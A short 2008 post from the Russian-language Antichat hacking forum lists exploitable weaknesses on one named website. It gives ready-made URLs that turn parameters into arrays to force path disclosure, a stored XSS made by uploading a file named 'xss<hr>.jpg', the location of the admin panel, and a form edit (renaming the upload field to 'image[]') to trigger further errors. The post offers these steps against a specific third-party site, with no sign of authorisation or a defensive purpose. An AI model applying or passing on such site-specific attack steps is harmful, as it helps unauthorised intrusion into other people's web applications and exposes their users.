
06.10.2008, 17:36
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме: 10046345
Репутация:
4589
|
|
Раскрытие путей
http://myproject.st8.ru/img.php?img[]=32
Активная ксс - загружаем к примеру файл xss<hr>.jpg
http://myproject.st8.ru/allpic.png
и
http://myproject.st8.ru/galinfo.php?idpic=32
Админка - http://myproject.st8.ru/admin.php
Раскрытие путей:
Код:
<input type="file" name="image" size="16" accept="image/*">
Меняем на <input type="file" name="image[]" size="16" accept="image/*"> и постим
Еще раскрытие путей
http://myproject.st8.ru/galinfo.php?idpic[]=32
---------
Да и проверять там особо нечего
|
|
|